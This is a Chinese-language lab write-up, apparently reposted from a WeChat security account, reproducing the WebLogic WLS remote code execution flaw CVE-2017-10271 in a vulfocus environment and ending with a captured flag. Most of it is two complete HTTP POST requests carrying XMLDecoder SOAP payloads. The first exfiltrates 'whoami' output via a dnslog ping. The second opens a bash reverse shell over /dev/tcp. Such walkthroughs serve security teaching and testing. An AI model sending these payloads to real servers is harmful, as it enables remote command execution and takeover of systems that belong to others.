漏洞简介
事项 |
描述 |
漏洞概述 | WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击 |
影响范围 |
10.3.6.0.0 12.1.3.0.0 12.2.1.1.0 12.2.1.2.0 |
漏洞编号 | CVE-2017-10271 |
漏洞搭建
这里使用vulfocus进行复现。
漏洞复现
访问http://192.168.146.167:35113/wls-wsat/CoordinatorPortType,发现访问成功,说明存在漏洞。
抓包,修改恶意payload
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.146.167:35113
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=zjJnjkFGT6c7wV1ymhhcbJKzzNJL2s22NKZL0tbRZzJL51Cc2By1!-1925820320; ADMINCONSOLESESSION=k3GKjkbQ11p0nJs2GXsr1b2KXNtxCJ2ntJbLJ7HxnmKF1J3YnTJX!-971490304
Upgrade-Insecure-Requests: 1
Content-Type: text/xml[修改的]
Content-Length: 611
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>ping `whoami`.o9lng5.dnslog.cn</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
在dnslog查看是否成功执行whoami
命令,发现成功执行whoami
既然可以执行命令,可以尝试反弹shell。需要注意的是,反弹shell的&
需要进行编码转换。
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.146.167:35113
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=zjJnjkFGT6c7wV1ymhhcbJKzzNJL2s22NKZL0tbRZzJL51Cc2By1!-1925820320; ADMINCONSOLESESSION=k3GKjkbQ11p0nJs2GXsr1b2KXNtxCJ2ntJbLJ7HxnmKF1J3YnTJX!-971490304
Upgrade-Insecure-Requests: 1
Content-Type: text/xml[修改的]
Content-Length: 634
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i >& /dev/tcp/192.168.146.167/9999 0>&1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
反弹shell成功。
查找flag位置。
过关。
- End -
原文始发于微信公众号(NS Demon团队):【漏洞复现】Weblogic远程代码执行漏洞(CVE-2017-10271)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论